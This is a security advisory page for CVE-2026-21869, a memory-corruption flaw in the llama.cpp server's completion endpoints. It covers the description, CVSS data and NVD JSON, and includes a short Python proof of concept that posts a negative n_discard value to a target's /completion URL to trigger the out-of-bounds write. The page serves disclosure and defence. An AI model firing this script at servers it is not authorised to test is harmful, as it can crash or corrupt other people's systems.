Security Vulnerability Report
中文
CVE-2026-21869 CVSS 8.8 HIGH

CVE-2026-21869

Published: 2026-01-08 00:16:00
Last Modified: 2026-02-02 19:12:36

Description

llama.cpp is an inference of several LLM models in C/C++. In commits 55d4206c8 and prior, the n_discard parameter is parsed directly from JSON input in the llama.cpp server's completion endpoints without validation to ensure it's non-negative. When a negative value is supplied and the context fills up, llama_memory_seq_rm/add receives a reversed range and negative offset, causing out-of-bounds memory writes in the token evaluation loop. This deterministic memory corruption can crash the process or enable remote code execution (RCE). There is no fix at the time of publication.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ggml:llama.cpp:-:*:*:*:*:*:*:* - VULNERABLE
llama.cpp <= 55d4206c8 (commit)
llama.cpp all versions prior to patch

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json import sys # CVE-2026-21869 PoC - llama.cpp n_discard Integer Overflow RCE # Target: llama.cpp server with vulnerable completion endpoint def exploit_llama_cpp(target_url, payload_prompt="test"): """ Exploit for CVE-2026-21869 Sends a crafted request with negative n_discard value """ exploit_data = { "prompt": payload_prompt, "n_predict": 100, "n_discard": -1 # Negative value triggers OOB write } headers = { "Content-Type": "application/json" } try: print(f"[*] Sending exploit payload to {target_url}") print(f"[*] Payload: {json.dumps(exploit_data)}") response = requests.post( f"{target_url}/completion", json=exploit_data, headers=headers, timeout=30 ) print(f"[+] Response status: {response.status_code}") print(f"[+] Response: {response.text[:500]}") if response.status_code == 200: print("[*] Request completed - check for OOB write or crash") else: print("[*] Server may have crashed or rejected request") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False return True if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-21869.py <target_url>") print("Example: python cve-2026-21869.py http://localhost:8080") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_llama_cpp(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21869", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:16:00.297", "lastModified": "2026-02-02T19:12:36.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "llama.cpp is an inference of several LLM models in C/C++. In commits 55d4206c8 and prior, the n_discard parameter is parsed directly from JSON input in the llama.cpp server's completion endpoints without validation to ensure it's non-negative. When a negative value is supplied and the context fills up, llama_memory_seq_rm/add receives a reversed range and negative offset, causing out-of-bounds memory writes in the token evaluation loop. This deterministic memory corruption can crash the process or enable remote code execution (RCE). There is no fix at the time of publication."}, {"lang": "es", "value": "llama.cpp es una inferencia de varios modelos LLM en C/C++. En los commits 55d4206c8 y anteriores, el parámetro n_discard se analiza directamente de la entrada JSON en los puntos finales de completado del servidor de llama.cpp sin validación para asegurar que no sea negativo. Cuando se suministra un valor negativo y el contexto se llena, llama_memory_seq_rm/add recibe un rango invertido y un desplazamiento negativo, causando escrituras de memoria fuera de límites en el bucle de evaluación de tokens. Esta corrupción de memoria determinista puede bloquear el proceso o permitir la ejecución remota de código (RCE). No hay una solución en el momento de la publicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ggml:llama.cpp:-:*:*:*:*:*:*:*", "matchCriteriaId": "0A466917-A76C-4F63-B744-EC07FFB90CAF"}]}]}], "references": [{"url": "https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-8947-pfff-2f3c", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-8947-pfff-2f3c", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}